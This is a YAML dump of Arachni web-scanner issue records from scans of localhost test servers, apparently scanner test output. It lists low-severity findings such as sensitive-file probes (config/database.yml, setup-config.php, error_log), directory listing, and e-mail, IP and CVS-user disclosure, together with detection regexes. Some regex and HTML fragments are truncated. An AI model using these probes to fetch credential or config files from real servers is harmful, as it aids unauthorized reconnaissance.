mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/config/database.yml injected: database.yml id: database.yml elem: path remarks: {} method: '' response: config/database.yml headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php injected: MMHTTPDB.php id: MMHTTPDB.php elem: path remarks: {} method: '' response: _mmDBScripts/MMHTTPDB.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/wp-admin/setup-config.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/wp-admin/setup-config.php injected: setup-config.php id: setup-config.php elem: path remarks: {} method: '' response: wp-admin/setup-config.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/wp-admin/install.php elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/wp-admin/install.php injected: install.php id: install.php elem: path remarks: {} method: '' response: wp-admin/install.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html url: http://localhost:10925/error_log elem: path method: '' name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common files variations: - !ruby/object:Arachni::Issue verification: false references: Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html opts: :regexp: '' url: http://localhost:10925/error_log injected: error_log id: error_log elem: path remarks: {} method: '' response: error_log headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common sensitive file description: Tries to find common sensitive files on the server. tags: - common - path - file - discovery severity: Low remedy_guidance: Do not expose file and directory information to the user. mod_name: Common files variations: [] internal_modname: CommonFiles internal_modname: CommonFiles - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/548.html var: url: http://localhost:10920/some/ elem: server method: GET name: Directory listing description: ! "In most circumstances enabling directory listings is a bad practise\n \ as it allows an attacker to better grasp the web application's structure." tags: - path - directory - listing - index cwe: '548' cwe_url: http://cwe.mitre.org/data/definitions/548.html severity: Low remedy_guidance: ! "Restrict access to important directories or files by adopting a need to know requirement for both the document and server root,\n and turn off features such as Automatic Directory Listings." 
mod_name: Directory listing variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/548.html opts: :element: server :regexp: '' var: url: http://localhost:10920/some/ injected: id: regexp: '' regexp_match: elem: server remarks: {} method: GET response: /home/zapotek/workspace/arachni/spec/servers/modules/recon/xst.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/htaccess_limit.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/http_put.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/webdav.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/allowed_methods.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_directories.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/interesting_responses.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/backdoors.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/backup_files.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/directory_listing.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_files.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/grep headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTM1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Directory listing description: ! "In most circumstances enabling directory listings is a bad practise\n \ as it allows an attacker to better grasp the web application's structure." tags: - path - directory - listing - index cwe: '548' cwe_url: http://cwe.mitre.org/data/definitions/548.html severity: Low remedy_guidance: ! "Restrict access to important directories or files by adopting a need to know requirement for both the document and server root,\n and turn off features such as Automatic Directory Listings." mod_name: Directory listing variations: [] internal_modname: DirectoryListing internal_modname: DirectoryListing - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/200.html var: url: http://localhost:14998/id elem: body method: GET name: CVS/SVN user disclosure description: A CVS or SVN user is disclosed in the body of the HTML page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Low remedy_guidance: Remove all CVS and SVN users from the body of the HTML page. mod_name: CVS/SVN users variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/200.html opts: :regexp: ! 
'(?-mix:\$Id: .* (\w+) Exp \$)' :match: john_id1 :element: body var: url: http://localhost:14998/id injected: id: regexp: ! '(?-mix:\$Id: .* (\w+) Exp \$)' regexp_match: john_id1 elem: body remarks: {} method: GET response: ! '$Id: https-test.pl 1081 2008-09-30 19:03:23Z john_id1 Exp $ ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: CVS/SVN user disclosure description: A CVS or SVN user is disclosed in the body of the HTML page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Low remedy_guidance: Remove all CVS and SVN users from the body of the HTML page. mod_name: CVS/SVN users variations: [] internal_modname: CvsSvnUsers internal_modname: CvsSvnUsers - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/200.html var: url: http://localhost:14998/id2 elem: body method: GET name: CVS/SVN user disclosure description: A CVS or SVN user is disclosed in the body of the HTML page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Low remedy_guidance: Remove all CVS and SVN users from the body of the HTML page. mod_name: CVS/SVN users variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/200.html opts: :regexp: ! 
'(?-mix:\$Id: .* (\w+) (?\n \n" :element: form :regexp: '' var: insecure url: http://localhost:14682/insecure injected: id: regexp: '' regexp_match: ! "
\n \n
" elem: form remarks: {} method: GET response: ! "
\n \n
\n\n
\n \n
\n\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTcy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Password field with auto-complete description: ! "Some browsers automatically fill-in forms with\n sensitive user information for fields that don't have\n the auto-complete feature explicitly disabled." tags: [] severity: Low mod_name: Password field with auto-complete variations: [] internal_modname: PasswordAutocomplete internal_modname: PasswordAutocomplete - !ruby/object:Arachni::Issue verification: false references: {} var: insecure_2 url: http://localhost:14682/insecure elem: form method: GET name: Password field with auto-complete description: ! "Some browsers automatically fill-in forms with\n sensitive user information for fields that don't have\n the auto-complete feature explicitly disabled." tags: [] severity: Low mod_name: Password field with auto-complete variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :var: !binary |- aW5zZWN1cmVfMg== :match: ! "
\n \n
" :element: form :regexp: '' var: insecure_2 url: http://localhost:14682/insecure injected: id: regexp: '' regexp_match: ! "
\n \n
" elem: form remarks: {} method: GET response: ! "
\n \n
\n\n
\n \n
\n\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTcy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Password field with auto-complete description: ! "Some browsers automatically fill-in forms with\n sensitive user information for fields that don't have\n the auto-complete feature explicitly disabled." tags: [] severity: Low mod_name: Password field with auto-complete variations: [] internal_modname: PasswordAutocomplete internal_modname: PasswordAutocomplete - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage var: Disclosure url: http://localhost:6217/header elem: header method: GET name: Private IP address disclosure description: A private IP address is disclosed in the body of the HTML page tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Low remedy_guidance: Remove private IP addresses from the body of the HTML pages. mod_name: Private IP address finder variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage opts: :var: !binary |- RGlzY2xvc3VyZQ== :regexp: (?-mix:(?\n \n" :element: form var: url: http://localhost:7111/captcha injected: id: regexp: (?i-mx:captcha) regexp_match: ! "
\n \n
" elem: form remarks: {} method: GET response: ! "
\n \n \
\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: CAPTCHA protected form description: Arachni can't audit CAPTCHA protected forms, consider auditing manually. tags: [] severity: Informational mod_name: CAPTCHA variations: [] internal_modname: CAPTCHA internal_modname: CAPTCHA - !ruby/object:Arachni::Issue verification: false references: {} var: url: http://localhost:12932/3 elem: body method: GET name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." 
mod_name: E-mail address variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) :match: a.little.more.unusual@dept.example.com :element: body var: url: http://localhost:12932/3 injected: id: regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) regexp_match: a.little.more.unusual@dept.example.com elem: body remarks: {} method: GET response: a.little.more.unusual@dept.example.com headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mzg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." mod_name: E-mail address variations: [] internal_modname: EMails internal_modname: EMails - !ruby/object:Arachni::Issue verification: false references: {} var: url: http://localhost:12932/2 elem: body method: GET name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." 
mod_name: E-mail address variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) :match: john32.21d@foo.blah.com :element: body var: url: http://localhost:12932/2 injected: id: regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) regexp_match: john32.21d@foo.blah.com elem: body remarks: {} method: GET response: john32.21d@foo.blah.com headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." mod_name: E-mail address variations: [] internal_modname: EMails internal_modname: EMails - !ruby/object:Arachni::Issue verification: false references: {} var: url: http://localhost:12932/1 elem: body method: GET name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." 
mod_name: E-mail address variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) :match: john@foo.blah.com :element: body var: url: http://localhost:12932/1 injected: id: regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) regexp_match: john@foo.blah.com elem: body remarks: {} method: GET response: john@foo.blah.com headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." mod_name: E-mail address variations: [] internal_modname: EMails internal_modname: EMails - !ruby/object:Arachni::Issue verification: false references: {} var: url: http://localhost:12932/0 elem: body method: GET name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." 
mod_name: E-mail address variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) :match: tasos@blah.com :element: body var: url: http://localhost:12932/0 injected: id: regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}) regexp_match: tasos@blah.com elem: body remarks: {} method: GET response: tasos@blah.com headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: E-mail address disclosure description: An e-mail address is being disclosed. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: ! "E-mail addresses should be presented in such\n a way that it is hard to process them automatically." mod_name: E-mail address variations: [] internal_modname: EMails internal_modname: EMails - !ruby/object:Arachni::Issue verification: false references: {} var: url: http://localhost:7085/ elem: body method: GET name: HTML object description: Greps pages for HTML objects. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational mod_name: HTML objects variations: - !ruby/object:Arachni::Issue verification: false references: {} opts: :regexp: (?mi-x:(.*)<\/object>) :match: ! 
' width="400" height="400" data="helloworld.swf"' :element: body var: url: http://localhost:7085/ injected: id: regexp: (?mi-x:(.*)<\/object>) regexp_match: ! ' width="400" height="400" data="helloworld.swf"' elem: body remarks: {} method: GET response: ! ' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: HTML object description: Greps pages for HTML objects. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational mod_name: HTML objects variations: [] internal_modname: HTMLObjects internal_modname: HTMLObjects - !ruby/object:Arachni::Issue verification: false references: HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly var: cookie url: http://localhost:14530/ elem: cookie method: GET name: HttpOnly cookie description: ! "The logged cookie does not have the HttpOnly\n flag set which makes it susceptible to manipulation via client-side code." tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Informational remedy_guidance: Set the 'HttpOnly' flag in the cookie. 
